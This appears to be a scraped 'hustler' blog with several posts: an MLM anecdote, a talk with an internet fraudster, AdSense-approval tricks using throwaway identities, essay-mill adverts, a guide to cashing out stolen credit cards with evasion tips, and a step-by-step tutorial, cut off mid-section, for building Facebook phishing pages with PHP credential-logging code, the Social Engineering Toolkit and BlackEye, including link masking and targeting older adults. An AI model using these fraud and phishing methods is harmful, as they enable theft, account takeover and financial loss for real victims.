Wednesday, September 16, 2020

Main Secrets Behind Successful Business Ideas

There is a widow here who approached me for details about my business and I asked her to connect with me on WhatsApp so we could discuss better. 



I gave her all the details about the business and the sustainability of the company. She loved it and appreciated my time. 

Then she proceeded to ask me, I just lost my husband and I have about N3m from his savings. What do you advise I do? Should I invest all of it as a stockist in your business or what?


I advised her with a question; Can you be determined to do this business? She said not really then I said no need. She wanted to know why. I explained.


Being a stockist doesn't end at investing. You also need to monitor your investment and how the business operates. You need to also invest your time to understand the basics of the business so that no one cheats you. 

My advise, get registered with the Family Pack and start the business. If you like what you see then invest. 


For further advise, what did you intend doing  initially? She said she wanted to do the drinks business. I supported her idea and told her how to start and what to avoid. 


She appreciated my effort and promised to get registered with the family pack. Guess what? I didn't see her again. I went for a follow up and she said, when you advised me not to start with the 3m, I felt discouraged and thought maybe it is a bad business. 


I laughed and told her that I can see she loves liars. Many networkers out there will hear such and lie to you. They will tell you to invest all the money and see plenty alerts. I cannot tell you lies especially as a widow. I am sorry for telling you the truth and if that's my punishment for saying the truth, so be it. I hung up. 

Out of guilt she came weeks later to register and abandoned the account. 


I am sharing this cos many of you are like this widow. You people love lies. You love to be deceived. You love being defrauded. 


I should have been a Star Director in Longrich under 1yr with the speed I have but see me I am a diamond leader cos I hate to tell lies. I rather tell you the truth and watch you grow than deceive you. 


As I was saying, many of you are like her. When liars come and tell you to invest 10m and get 100k every week, you will run and give them the 10m. When you realise it was all lies, that is when you will have sense.


When someone tells you the truth that you should not patronise some skincare people who whiten you under 7days you will not hear. You will go and buy the cream and when your skin becomes a war zone of rainbow colours you will go back to your friend and cry for help.


A friend will say, don't buy that iphone. Iphone is not sold that cheap you'll disobey and think your friend hates you. Only for you to end up buying packaged fufu.


When you see people with integrity advising you, pls and pls, listen to them and respect their sincerity. Mind how you rush attractive deals that have underneath tears. You will cry oh. 


I said I should gist you what happened. 


Good evening

Tuesday, September 15, 2020

A Conversation With An Internet Fraudster

I have always wanting to have an interview with an internet fraudster (Yahoo boys), I want to hear from the horses mouth, why they choose to follow such ignoble path 

Internet fraudster


Off course, they are every where in my neighborhood, it's easy to know them, as they always, live and look larger than life, they flaunt expensive gadget, as ladies hovers around them


Certainly, I have to come down to his level, after establishing a conversation, about how the country is hard, I  told him, I'm willing to join them, only that, I don't want to go fetish, he open up to me that, it's not necessary, that I must go fetish, only that, it would reduces my opportunity of cashing out, he was willing to help me, this gives me an opportunity to ask all my question, 


And I asked, Of all the opportunities around regardless of our economy state, why choosing to steal from people, as their action has led a lot of people to commit suicide and has left many bankrupt and battered. His reply was impressive, 


He said, life is like a jungle. A lion is chasing a zebra, the lion who has not eaten for days is praying to God not to miss out on this opportunity to eat, while the zebra on the other hand is praying also, to the same God, to spare it's life, in the end, God would answer one of their prayer, he said same is applicable, they  pray to God for their client to pay, while their client too is also praying not to be defrauded. He added, in life, it's either you are a predator or a prey, and that, it's better to be predator


I ask again, don't you think it's a bit unfair to stake the image of our dear country for a mere "Morsel of bread" he reply, there's nothing left to protect in country like Nigeria, and that she's beyond salvation, the leaders alone destroy everything and everyone just want to survive 


I ask again, after cashing out, why not invest the money in a business and stop this thing? He said, it's not that easy, he added

Monday, September 14, 2020

How To Get Adsense Approval Using Abante Cart CMS

 How To Get Adsense Approval Using Abante Cart CMS



All this google adsense approval tips have been sharing so far are tested and working fine have been using it and all are working fine just decided dropping the tips for the benefit of all.


I would always recommend you get a new domain cause I can't predict such format for an old domain which must have gotten rejected before. So now get a new domain, before you buy a new domain please do the following.


1. Make sure the domain have not been used before and dumped, use whois to check the history of the domain name you want to buy, making sure it has not been used before.


2. When you must have bought the domain, add the domain to your hosting plan. This is where the work is, when you add the domain to your hosting do not install WordPress, check your cms you will see something like AbanteCart, install it for the particular domain you want adsense on.


3. Now after installation of the AbanteCart you would notice a demo content there, do well to delete all the demo content.


4. Now write 10 unique contents of at least 1000 words, the contents should be on product review thereby adding the price tag also and image, Download your image from pixabay only.


5. Before the completion of the 10 articles, write 5 articles first then apply, when it's under review make sure you write another 5 articles within 3days of applying.


6. Now force people to visit the site at least 10 page views daily to increase the impression, please avoid traffics from Facebook unless you want to condemn the domain


7. Wait for 2 weeks maximum and your adsense will be approved.


8. Please make sure you don't apply with email or device that you have used before, better still go to a cyber Cafe create new Gmail using a fresh phone number then apply their, after two weeks visit the cyber Cafe again to check your application status. 


For those flooding my inbox for adsense approval please Brethrens chance no dey for me have been very much busy, just follow this tips and you will get approved.

Sunday, August 30, 2020

The Best “Do My Homework” Sites for Students [2020]

Please share this post with your friends. It will also help them
In the world we live, means of doing homework tasks has been evolved. Earlier, kids and students stayed at home after classes and practice all day handling assignments of various complexity levels. But nowadays, students do not want to cope with everything on their own. They need ehelp in the forms of apps concerned with tutoring and online solving services.

Students are used to making online requests such as “help me do my homework” or “handle my assignment for me”. They ask for technical assignment help from professional sites such as AssignCode. Because it is one of the reliable websites where exclusively qualified solvers work. They can handle any task for you within any time frame you need. So, if you have not known what service to choose yet, AssignCode will become a great choice.
Best “do My homework” sites
A student with her already-solved homework

Homework Help Online: What Are the Benefits?

Homework help online including downloading any app concerned with solving math assignments and seeking assistance on the services where every solver is a technical specialist. In the first case, your task is being done by a robotized system. In the last case, you order an assignment on the service where a specialist performs your assignment online for you.

Of course, if you choose to ask for help with your algebra or geometry homework from professional websites, your assignments will be done at the highest level. So, you are likely to get a good mark for it. Because such a solving center as AssignCode works like a tutor. Furthermore, it has many more advantages than tutoring.

Because it does not require buying any tutorial or visiting some extracurricular classes to practice.
  • On such websites, every helper is a professional solver who has some fields of interest and can solve any problems within these aspects (accounting, mathematics, chemistry, engineering and so on).
  • Every employee is concerned about customers’ satisfaction. They do their best to meet the deadline and all the criteria determined by the client. Because they make money for the completed order only after a customer submitted his or her full satisfaction with the task done.
  • You can apply to the service anytime you need it. The staff of the service consists of professionals from all over the world. So, if it is night now in your country and you need a task completed right now, somewhere overseas now it is a day-time and there’s someone who is ready to help you. Of course, every one of the foreign solvers knows English well, so there will be no misunderstandings regarding our task.
  • Trustworthy, qualified specialists can handle homework of any complexity. No matter what the assignment is, they are smart enough to cope with everything.
  • If you are still hesitating and do not know what service to choose, contact-free AssignCode helpline and get answers to all your questions regarding the pricing policy, the competence of the solvers and the quality of the services offered.
As you must have understood, online solving services are very beneficial for students who need help with their homework but do not want to hire a personal tutor. Nowadays it is a very common tendency to order assignments online because it is convenient, fast and reliable.

Write “Do My Homework For Me” in the Search Engine and Order Your Homework Online

If you are still hesitating whether to apply to the online solving service, stop worrying about nothing. If you choose such a professional and trustworthy company as AssignCode, your task will be completed at the highest level. At the same time, you will buy it for a reasonable and even cheap price. Because helping customers top online solving services are also concerned about their pricing policy and do everything possible to make their services affordable for every student.

So, if you have some problems with your math, physics or chemistry assignment, make “do my homework for me” online request and place your order on one of the best solving services!
Please share this post with your friends. It will also help them

Founder at Topwritersden.com
A professional freelance writer, a sales speaker, and a youth & development consultant. I write to inspire, show readers the possibility that abounds for them. Please if you want me to speak at any event, seminar, or be of help, please reach by sending a mail to mike.bush@topwritersden.com
Obinwanne Umunna
Latest posts by Obinwanne Umunna (see all)
Fast Hour Essay Writing Service: 6 Must-Have Features

Please share this post with your friends. It will also help them
“How great the life of a college student would be if not so much of essay writing” – It’s the statement most students would agree with. Writing papers takes much time and energy, which results in a lack of time for healthy sleep, entertainment, hobbies, etc. Is there any way to deal with this problem? Fortunately, yes! Students of the XXI century should thank God for living in the age of Internet technologies.

Have no idea how to do a college assignment? Just use Google to find a top academic helper. You’ll get numerous offers from freelance writers living in the USA and other countries and writing papers for money. You aren’t recommended to entrust the first writing service to complete your paper. First, make sure that it can meet all of your personal requirements.

You can do this by reading unbiased reviews about essay writers online. According to the opinion of hundreds of students, 8HourEssay.com is a trustworthy essay writing service that offers the best guarantees in today’s market of writing services. Spend at least several minutes to look through the features it provides its customers with.
Fast Hour Essay Writing Service

Essay Writing Service: Guarantees that Distinguish Reputable Companies

Do you wonder what makes 8HourEssay.com a trusted company whose service is worth using? Let’s have a quick look at the guarantees its clients enjoy for you to have a clear picture of how to distinguish a reliable company from fraudsters.
  • Quality assurance. At 8HourEssay.com, you’ll get excellent essays written from scratch. Each piece of writing created by these writers is full of creative thoughts and ideas. You won’t find the plagiarized content in the finished paper. Purchasing papers from this 8-hour essay writing service, you can be sure that it’ll be error-free and 100% authentic.
  • The best American writers. A reputable essay writing company hires only native
English speakers. The competent writers from the USA, UK, Australia, and Canada can create flawless papers avoiding grammar mistakes. The company we’re talking about is the one that can boast a strong writing team that consists of talented and best-qualified specialists.
  • Fast performance. Choosing a rush essay service, you can forget about tight deadlines. It isn’t a problem if you need to submit an essay urgently. Reliable custom writing services accept urgent orders and deliver them without a delay.
  • Affordable prices. The flexible pricing policy is one of the most important criteria good companies need to meet. Check if the company offers high-quality at a fair price. Don’t be tempted by those who has too cheap price. You should understand that professional writers who have got Masters and Ph.D. degrees won’t work for free. They won’t spend their valuable time on your academic papers just because writing is their hobby. Too cheap papers may contain plagiarism and errors. The prices for high-quality writing you’ll find at the 8HourEssay.com are reasonable.
  • Free revisions. If you want to buy an essay, a research paper, or a dissertation, make sure that the company offers free revisions. If you aren’t satisfied with the paper quality, it’ll be reviewed until you get the result you’ve paid for. The right to ask for a free revision is one of the features that distinguish good and unreliable companies. 8HourEssay.com is the place where you’ll be able to request a revision paying nothing for this.
  • Money-back guarantee. Nobody wants to pay for a service and feel disappointed with its quality. Don’t buy papers until you make sure that the company provides you with the risk-free features like a money-back guarantee. It’s one of the reasons why the discussed company has been rated high and recommended by most students.
Now you know that you shouldn’t rush to write “Help me with my paper” until you use the above-discussed checklist of the important features.

Please share this post with your friends. It will also help them

Founder at Topwritersden.com
A professional freelance writer, a sales speaker, and a youth & development consultant. I write to inspire, show readers the possibility that abounds for them. Please if you want me to speak at any event, seminar, or be of help, please reach by sending a mail to mike.bush@topwritersden.com
Obinwanne Umunna
Latest posts by Obinwanne Umunna (see all)
How to Use Stolen Credit Card Numbers for Money
Please share this post with your friends. It will also help them
Do you have a credit card in your palm? I bet you’re wondering how to use it for money without any agency attempting to track you. Here, you will learn how to use stolen credit card numbers within 10 minutes to own a Benz.

A lot of dark websites claim to know how to use stolen credit card numbers to help run frauds. However, these are all lies because they’ll take advantage of the card details and grow richer.
There are several methods that the bad guys use to make money with stolen credit cards. You will be shown exactly how to use a stolen debit card to get cash without shit. We do not demand for any card detail because we do not support this act, although it pays.
Without boring either yourself or mine, let’s see how rugged guys use stolen credit cards/details to make money.

Why It is so Easy to Use Stolen Credit Cards

The only way to say that a credit card is safe is when it’s with the owner. This is the situation because each of the numbers on the credit card are security PINs. The CVV, the card number, and the expiration date are what makes up a credit card. The metallic slate is just there with data input that communicates with the mechanisms.
The only downside in stolen credit cards is that activities can be tracked. Unless you don’t go online with the card, activities can be tracked but not easily. But not to worry, this article contains what bad guys do to get away with stolen credit cards.

How to Use Stolen Credit Card Numbers – Trending 5 Ways

There are several methods on how to use a stolen debit card to get cash immediately. The bad guys use all of these methods to get rich only when they’re careful. They don’t often worry about the cops because of the measures put in place.

1. Sell On Dark Web

This is the number one option to consider because it has zero traceability. The reason is because the stolen or picked credit card will not be tracked to you. There are very few working dark websites out there. Most of the websites who claim to be authentic are fake. That is, when they obtain the card details, they don’t pay back. As such, as the bad guy, one ought to be careful with the website in question.

How to Use Stolen Credit Card Numbers

What the Dark Websites Do

After a successful sign-up to any of the sites, a user will eventually follow up the screen prompts to complete a deal. I can’t say exactly how to submit the card details to a willing buyer or a fraud company in need. This is because each of these dark places have their own mode of operation.

Note: During every activity on these websites, you must have a powerful VPN connected. Otherwise, your identity will be compromised and tracked down using the IP.

Moreover, most dark nets do not pay immediately after receiving card details. Confirmations are first made before progress.

What to Know!
During the verification or deal period, do not for any reason provide your personal details. The moment this is done it can be used against you. If there are/is any other thing to do, endeavor to do so for your safety.

Here is an example of dark websites that buy credit card details very fast.
This fraud powerhouse runs on Tor network that allows every user to be fully anonymous. I do not intend to link this article to the site for some reasons. If you’re interested in the complete URL, you know what to do.

It is advised to run the entire process using Tor.
Meanwhile, I know of some social groups that do this too. You sure want to know and you’re free to find out here.

2. Virtual Card-Switching

This is one if the coolest ways on how to use stolen credit card numbers to buy things. This method is simple and straightforward. In fact, smart fraudsters follow this pattern to get through all difficulties that accompany stolen credit cards. What a fraudster does here is very simple. That is, the card details are being switched to a new credit form know as virtual.

You know what this means? The fraudster is now at liberty to buy until the bank account of victim runs low. One cool feature about this method is that even cops are unable to guarantee the victim of a return. That is, the doer of the deed is almost untraceable, unless there were cameras monitoring the scene.

When cops attempt to trace the transaction, the farthest they can go is the store where the transaction took place. What exactly can the store do in this situation? Nothing! It is thus safe to say that switching details to a virtual card is one very rugged way to take advantage of credit card numbers. Read a little more about the virtual card of a thing here. It could turn out to be the method you use and buy stuffs for yourself.

3. Run Facebook Ads

How to Use Stolen Credit Card Numbers
I was literarily dumbfounded to find out that Facebook ad runs without requesting for PIN. This has me questioning like “doesn’t this make people vulnerable?”. Well, the answer to my question is that this makes credit card owners very vulnerable.

What Fraudsters Do

Do you intend to run fraud with those credit card numbers? If so, here’s what fraudsters do to earn.
First, fraudsters require a Facebook account. There are three options to pick from.
  1. Buying an old Facebook account.
  2. Hacking a Facebook account.
  3. Creating another account with hidden IP and wrong details.
Now, the fraudster offers to advertise a company’s business and get paid. The fraudster ensures that he/she already has one, two, or more businesses who pay for the adverts. When the fraudster picks up the card details, he enters them on the Facebook ad manager and saves it as preferred card. He then increases the Facebook ad to the maximum level and shows the proof to the company. Won’t the company be pleased? Of course the company is very pleased to see their business reaching millions within few hours.

There is something funny about Facebook ad. Even when there is no money in the account attached to the credit card, the ad still runs. If the ad runs for 1 Million Dollars, that account automatically owes Facebook the sum of 1 Million Dollars while the fraudsters scampers with the money he/she is paid for the ad.
Believe me, this is unbeatable!

4. College Portals

Lots of colleges run fee payments through various platforms that do not require PINs. However, there are some fee payment platforms that demand a OTP (One-time Password). When a payment portal requests OTP, it becomes difficult to get past the transaction. This is because the account owner is being notified with the OTP for the transaction.

If you’re interested in this method, find out the operator that runs payment for the school near you. This method is best when you’re dealing with the person you know. For example, it could be that you plan to punish a stingy aunt or uncle.

How It is Done

First, the bad guy will sign-up in any payment center or rapport with the authentic guys. He tells them that he wants to run fee payments for students. Now, for every student, he pays and authenticates the payment with the OTP SMS. Until this deed is done, the account owner will not be aware of the whole game.

Note: It’s wrong to disclose one’s self to the other guys who run the payments.
At this point, all fees paid directly to the fraudster becomes his. Several states have recorded this fraud for a while now and it’s still in vogue.

5. Buy Gift Cards

Lots of guys are really into this gift card of a thing with credit details they come across. This method on how to use stolen credit card numbers is the easiest to do but very vulnerable.
How to Use Stolen Credit Card Numbers

Let’s say you’re getting gift cards from Amazon, your identity will be given out. And this means easy tracking. Might be you should consider going ghost or connecting with people that can make this look easy. Or better still, if you know trusted guys that do not stay in your country, message them the details via encrypted chats. They should use the card over there to run transactions and take their caught. You can find groups for this people…We’re not saying them here at all.

How Bad Guys Use Credit Card for Fraud Without Getting Caught

Before or after carrying out the act, you might want to do the following to avoid getting caught. These are the processes that the bad guys follow and they advise you to follow suite.
  • If you don’t know how to get stolen credit card numbers with zero trace, don’t attempt the act.
  • Make VPNs a companion.
  • If the stolen credit card details involve a conversation, encrypt the conversation.
  • Avoid CCTVs
  • Appear on hoods and gloves.
  • Always cover front-facing cameras.
  • Be speedy!
  • Never provide true personal details no matter the occasion.
  • Lastly, remain conscious of the environment and follow up the report even on the media.

Final Thoughts

How did you get the credit card number/details? Do you even know how to get stolen credit card numbers without trace? If not well enough, stay away!
Whatever reason lands credit card numbers in your palm, choose to be a good man because it pays. Despite reading how to use stolen credit card numbers here, it’s just to show you how it’s done with no support for it.


As a newbie, the chances that you’ll get caught are high and thus, you’re discouraged to proceed. If you turn a deaf ear, endeavor to do all things possible to stay ‘ghost’ or land in jail. That said, no country tolerates this act. This page does not also encourage you to do such. Return misplaced credit cards and do not get yourself into any mess.

Stay Safe!
Please share this post with your friends. It will also help them



Founder at Topwritersden.com
A professional freelance writer, a sales speaker, and a youth & development consultant. I write to inspire, show readers the possibility that abounds for them. Please if you want me to speak at any event, seminar, or be of help, please reach by sending a mail to mike.bush@topwritersden.com
Obinwanne Umunna
Latest posts by Obinwanne Umunna (see all)
How to Create a Phishing Website 2020 {PC & Phone Setup}
Howdy, hustler? There is this disturbing hustler in my list requesting for how to create a phishing website. I can’t conceal the secret anymore because a phishing webpage is an essential tool for any online hustle. One of the first stages of becoming a hacker is to learn to phish.

Hiring a web developer to design a phishing website is a BIG mistake to avoid. The reason is that the developer will become aware of your secret. If the web developer is a freaking hustler, he might install viruses that will monitor your phishing activities. In short, it compromises the money you should bill the clients using your phishing website.

Fortunately, you will learn how to create a phishing site with or without programming skills. Yes, there is no mistake in what you just read. You’ll further learn how to create a phishing website with your phone (iOS, HarmonyOS, or Windows) and how to make a phishing site on Android.

What to Consider before you Create a Phishing Website

There are several methods regarding how to create a phishing website for billing. Nevertheless, I welcome the pain to teach you as many methods for creating a phishing website that works. This lesson is also important if you also want to learn to hack a Facebook account
The lessons will mainly cover:
  • how to make a phishing site with 000webhost
  • how to make a phishing webpage in Kali Linux
  • how to create a phishing site using Android
Where necessary, I will indicate how to make a phishing site on Android and other mobile operating systems. Understand that it is not every method for creating a phishing website that you will learn can be possible with a mobile phone. I will advise that you skip methods that require a PC if you have either Android, iOS, Windows, HarmonyOS, etc.

Note: I recommend Android over any other OS.

Platforms for Creating Webpage for Phishing

The two platforms we will use are:
For easy understanding, I will indicate when a method is possible with a phone. If it applies to PC only, I will also indicate for you.
So, how can I create a phishing website that works?
How to Create a Phishing Website

  • Method 1: How to Make a Phishing Site with 000webhost
  • Method 2: How to Make a Phishing Webpage in Kali Linux
  • Method 3: how to create a phishing site using Android
  • Method 4: Create a Phishing Website Using Super Phisher

Method 1: How to Make a Phishing Site with 000webhost

Regarding how to create a phishing website, 000webhost is one of the prestigious methods. This method also regards how to make a phishing site using notepad. It requires a PC for the best experience. Nonetheless, you can use an Android phone, but it must have at least 3 gigabytes of RAM storage.
create a phishing website with webhost000
Webhost Cpanel Login

Identify the Target Website and Download the HTML Index

For this guide, we are creating a phishing website out of www.facebook.com.
For Android
  • Download Naked Browser LTS from Google Play Store
  • Visit facebook.com
  • Swipe your screen to the right.
  • Click View Page Source.
You should now see the source code of facebook.com. Nobody knows that source code is viewable with a mobile phone. So, try to keep my secret a secret.
For PC
  • Install Firefox or Chrome
  • Visit Facebook.com.
  • Right-click and select View Source. In some browsers like Firefox, you will see View Source Element.
Your browser will split-display, and what you find on the right or left side of your screen is the HTML source code of the Facebook webpage. If you are using the Naked Browser LTS for Android, the source code will open in a new tab.

Copy the HTML Source Code

You now have to select and copy the entire text. This method is purely how to make a phishing site using notepad because it requires either the notepad or WordPad application to be successful.
For Android
  • Download FX file manager.
  • Launch the app and Media Card.
  • Click the options button at the top-right screen.
  • Click File.
  • Click Text.
  • Name the file as index.html.
  • Paste the Facebook HTML source code.
You now have to use someone’s PC and convert the index.html file to Unicode using Windows Explorer. Simply click on Save As and set the encoding to Unicode.
For PC
  • Install a Notepad (recommended) or WordPad.
  • Launch the Notepad and paste the HTML source code.
  • Click Save As.
  • Name the file as index.html.
  • Set Save as type as All Files and set Encoding as Unicode.

Create the Password PHP File

This stage is the main deal regarding how to create a phishing page of any website. It is where every Facebook client login password will go for phishing to be successful. Since you have no programming knowledge, copy the code below.
<?php
header (‘Location: facebook.com ‘);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rnnnn”);
fclose($handle);
exit;
?>
Now, paste this code in your Notepad (PC user) or create a new .txt file using Android (mobile users). Use post.php as the file name and select Unicode for the encoding format.

Merge the PHP File with the HTML Source Code File

Concerning how to create a phishing web, if we do not integrate the PHP file in the HTML file, phishing won’t work. If you are using an Android phone, download PC Keyboard from
What do we do? Below are the steps to integrate the PHP keyword picker in the HTML.
  • Launch the HTML file with your browser.
  • Click Ctrl F.
  • Input “=action” in the provided space.
  • You should see an underlined part of the codes. Select and replace the portion with “post.php”.
If you are creating a phishing website from a site other than Facebook, the method will not be the same. However, you can access the login of that site by doing the following:
  • Open the website.
  • Click Login.
  • Right-click and view page source. You should find something similar to what we have for Facebook in this article (=action).

Host the PHP File Online with 000webhost

In case you are wondering what the “hosting” means, it is simply the act of making the phishing website available online. Without hosting the PHP file, clients will be unable to access the website, and you will not phish passwords. Do the following to host the files on 000webhost.
  • Visit 000.webhost.com.
  • Sign up for free and confirm your email address.
  • Click Upload Files Now.
  • Select the Public_html folder and click the upload icon in the toolbar.
  • Click Select Files and select the PHP file.
  • Hit Upload, and your files will upload to the servers.
Note: I have tested the free hosting from 000webhost, and it is quite slow with several downtimes.
You have to change the permission to 777 and tick all the boxes in the screen prompt. Finally, close the FTP server and copy down your web address.

Host the Phishing Page

Regarding how to make a fake website for phishing, it is time to host the phishing webpage. Below are the proper steps towards hosting the phishing page as someone without programming skills.
Note: If you uploaded to the root folder of your web host directory, add http:// just in front of the site.

If you are not sure whether you added, you can test by navigating to http://yourwebsiteforyourpostphpupload/post.php. If it redirects to the website you are phishing, you are good to go. In the case of this article, it will redirect us to www.facebook.com. If there are issues, confirm whether you uploaded it to the file to the right directory. If everything is successful, copy and paste the index.html text in www.htmlpasta.com. Complete the Google reCAPTCHA challenge and click Paste. The action will automatically generate a link for the phishing website you are creating.

Test the Website

Visit the phishing website you just created and try to login with any Facebook login detail. When you click login, it should redirect you to www.facebook.com. If there is no redirection, there is a problem. After all, the principle regarding how to create a phishing page step by step is that you remain attentive per step.

If it logs in correctly, navigate to your FTP server, and you should find a Log.txt file. In this guide, the Log.txt file is present where we have the post.php file. Open the Log.txt file and you should find the Facebook login details you attempted in frontend (the user-accessible login page).

 Guess what? Your phishing website is ready with the help of 000webhost! Share the link with targets you want to phish. You can also do Facebook phishing to hack a Facebook account successfully.

Method 2: How to Make a Phishing Webpage in Kali Linux

This method concerns how to make a phishing webpage in Kali Linux. Unfortunately, mobile users will be unable to create a phishing webpage using this method. The reason is that Kali Linux will not run on mobile. Even if there is a way to run the Kali Linux on mobile, the experience will not be good. So, let’s see how to create a phishing webpage combining Kali Linux and the credential harvester.
#Requirements
  • Kali Linux
  • Social Engineering Toolkit (preinstall in Kali Linux)
  • Target phishing website URL.
For this guide regarding how to create a phishing website, we will create a phishing page for www.facebook.com. The process is the same notwithstanding the website you prefer to use for the phishing creation.

Launch the Terminal in Kali

First, open the terminal window in Kali and be sure to have root access. If you are a non-root user, type sudo root and enter your password. From the Application options, click the dropdown and select Kali Linux > Exploitation Tools > Social Engineering Toolkit > Setoolkit.


If you are a root user, simply type setoolkit in the command line. A warning message will appear informing you that this tool is to be used with company authorization or for educational purposes only and that the terms of service will be violated if you use it for malicious purpose. Well, since you will be using it for a malicious purpose, you are already violating the terms of service.
Anyway, type “Y” to agree to the terms and conditions of using the tool. Y stands for yes.

Social Engineering Attack

Still, on how to create a phishing page step by step, it’s time to play around with the Social Engineering Toolkit. Bear in mind that the essence of this method is to capture user logins and the Social Engineering Toolkit is the password harvester. Let’s proceed!
A menu will come up after you insert the “Y” command. Do the following:
  • Input 1.
  • Input 3 to select Credential Harvester Attack Method.
At this point, you are presented with options to either clone a page for phishing or create a malicious phishing page. For this guide on how to create a simple phishing page, we will select the cloning option for facebook.com.
  • Input 2 to select Site Cloner.
Note: You have to be patient because it will take time for the Social Engineering Toolkit to clone Facebook. It might take even longer for weak PCs.

Set IP Address for Password Harvesting

Open a new terminal and type in ifconfig. Look for ‘inet’ and copy the IP address you find there. Social Engineering Toolkit will request for the IP address to store the credentials it will capture. Simply paste the IP address you copied in the recent terminal.

Input Your Phishing Website

Enter the site you want to use for creating a phishing page. Note that we use facebook.com in this step by step guide for creating a phishing website. Social Engineering Toolkit will request for Apache Server to run while phished data is written to Apache root directory. Input “Y” to allow and the phishing setup for facebook.com is complete.


Facebook.com is now hosted, and your phishing page is active. So, you can now share with the targets you want to phish. But then, there is a little problem. Clients become suspicious and will not want to use the IP to login to Facebook. Fortunately, there is a solution; what do you do?
You require a link shortening service to conceal the malicious login link before sending out to phishing targets. Some of the link shortening service providers are:
  • ly
  • ly
  • ClickMeter
  • TinyURL
  • Rebrandly
  • T2M
  • gl
Copy your IP address as http://yourIPaddress and paste in any of the link shortening services. It should look like http://72.229.28.185. Click shorten URL and the IP link will change to a unique URL that will redirect credentials to you.

Share the link as Email, text message, social media message, etc. You can increase your phishing chances by targeting older adults or convincing young users to login via the link. Simply tell them that it is the new mode of accessing Facebook or the phishing site that you use for free.


Finally, locate the login details by clicking Home > Root > Var > WWW. Click on the HTML or .txt file for a list of passwords from people that use the link to access their accounts.

Method 3: How to Create a Phishing Website with Your Phone

This method is a special method from me to you because I’m aware that about 50% of hustlers have no PC. It requires your phone and BlackEye application. The BlackEye app I have supports phishing on 32 websites. Some of the websites include GitHub, Protonmail, Facebook, Shopify, Twitter, PayPal, Google, Gitlab, Adobe, MySpace, Pinterest, Verizon, etc.


Normally, BlackEye is most functional using Kali Linux concerning how to create a phishing page of any website. However, we can install the relevant commands on an Ubuntu or Debian device. Simply update the Kali distro, and you install BlackEye.
Note: We are using facebook.com for this guide to create the phishing page.

Download BlackEye

Before downloading BlackEye, clone the source from the GitHub repository. How do you clone the source correctly?
Open a terminal window and input the command codes below.
~$ git clone https://github.com/thelinuxchoice/blackeye
Cloning into ‘blackeye’…
remote: Enumerating objects: 361, done.
remote: Total 361 (delta 0), reused 0 (delta 0), pack-reused 361
Receiving objects: 100% (361/361), 8.01 MiB | 3.17 MiB/s, done.
Resolving deltas: 100% (101/101), done.
~$ cd blackeye
~/blackeye$
The command above will install and activate the BlackEye repository. Go to the blackeye folder and run the bash blackeye.sh command. Below is what you should see:


~/blackeye$ bash blackeye.sh :: Disclaimer: Developers assume no liability and are not    ::     :: responsible for any misuse or damage caused by BlackEye.  ::     :: Only use for educational purporses!!                      ::      :: Attacking targets without mutual consent is illegal!      :: [01] Instagram      [17] IGFollowers   [33] Custom     BLACKEYE  v1.1[02] Facebook       [18] eBay[03] Snapchat       [19] Pinterest[04] Twitter        [20] CryptoCurrency[05] Github         [21] Verizon[06] Google         [22] DropBox[07] Spotify        [23] Adobe ID[08] Netflix        [24] Shopify[09] PayPal         [25] Messenger[10] Origin         [26] GitLab[11] Steam          [27] Twitch[12] Yahoo          [28] MySpace[13] Linkedin       [29] Badoo[14] Protonmail     [30] VK[15] WordPress      [31] Yandex[16] Microsoft      [32] devianART

Modify Facebook.com Page

how to modify facebook.com page
Right-click and click on the “View Page source”
Facebook.com will show an expired copyright notice. If you do not like that, return to the blackeye folder from the bash script and type Is. Typing Is will display the sites folder in the BlackEye repository.


~/blackeye$ ls blackeye.sh  LICENSE  README.md  sites
With the cd sites command, you can still navigate to the sites folder and then reveal the sites by entering Is command. You can then choose the template site to modify for the phishing. For this guide, facebook.com is our interest.


~/blackeye$ cd sites~/blackeye/sites$ ls adobe   cryptocurrency  facebook  google          linkedin   myspace  paypal      shopify   spotify  twitter  wordpressbadoo   devianart       github    instafollowers  messenger  netflix  pinterest   shopping  steam    verizon  yahoocreate  dropbox         gitlab    instagram       microsoft  origin   protonmail  snapchat  twitch   vk       yandex
For you to edit Facebook, retype Is to access the files. It will be similar to the source code below:


~/blackeye/sites$ cd facebook~/blackeye/sites/facebook$ ls index_files  index.php  ip.php  ip.txt  login.html  login.php  saved.ip.txt  saved.usernames.txt
Now, edit the HTML source code of facebook.com using any text editor from the app store. Simply open login.html, and you should find the source code for the Facebook login page.

Build the Facebook.com Phishing Page

Do the following:
  • Open a new terminal window.
  • Navigate to the blackeye folder.
  • Run bash blackeye.sh.
  • Return to the selection menu of the phishing page where you have a list of phishing websites.
  • As you can see in the source code below, Facebook is number 2, so you have to select 02 and press enter.
~/blackeye/sites/protonmail$ cd~$ cd blackeye~/blackeye$ bash blackeye.sh [01] Instagram      [17] IGFollowers   [33] Custom     BLACKEYE  v1.1[02] Facebook       [18] eBay[03] Snapchat       [19] Pinterest[04] Twitter        [20] CryptoCurrency[05] Github         [21] Verizon[06] Google         [22] DropBox[07] Spotify        [23] Adobe ID[08] Netflix        [24] Shopify[09] PayPal         [25] Messenger[10] Origin         [26] GitLab[11] Steam          [27] Twitch[12] Yahoo          [28] MySpace[13] Linkedin       [29] Badoo[14] Protonmail     [30] VK[15] WordPress      [31] Yandex[16] Microsoft      [32] devianART [*] Choose an option: 18

After selecting Facebook as a phishing website, the terminal will request an IP address. Input your IP address, press enter, and you will see something similar to what we have below.
[*] Put your local IP (Default 10.0.6.27): [*] Starting php server…[*] Send this link to the Victim: 72.229.28.185[*] Waiting victim open the link …
You can now navigate to facebook.com for the result of your phishing setup.

Capture the Password on Facebook

Now, you can share the link to targets and convince them to use the link.
[*] Waiting victim open the link … [*] IP Found![*] Victim IP: 72.229.28.185[*] User-Agent:  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0[*] Saved: shopping/saved.ip.txt
The moment your target uses the link to login to facebook.com, BlackEye reports the username, as you can see below.
[*] Waiting credentials … [*] Credentials Found![*] Account: smartlazyhustler[*] Password:  thesmartlazyhustler1997[*] Saved: sites/shopping/saved.usernames.txt
The only downside with this method is that it will not work if the target uses 2FA security on his/her account.

Method 4: Create a Phishing Website Using Super Phisher

Super Phisher is a simple tool that phishers do not use very often. It is a straightforward tool to use, and I’ll quickly highlight things to do to create a unique phishing site.
#Requirements
Note: We are using facebook.com for the sake of this phishing website guide.

Download and Extract Super Phisher

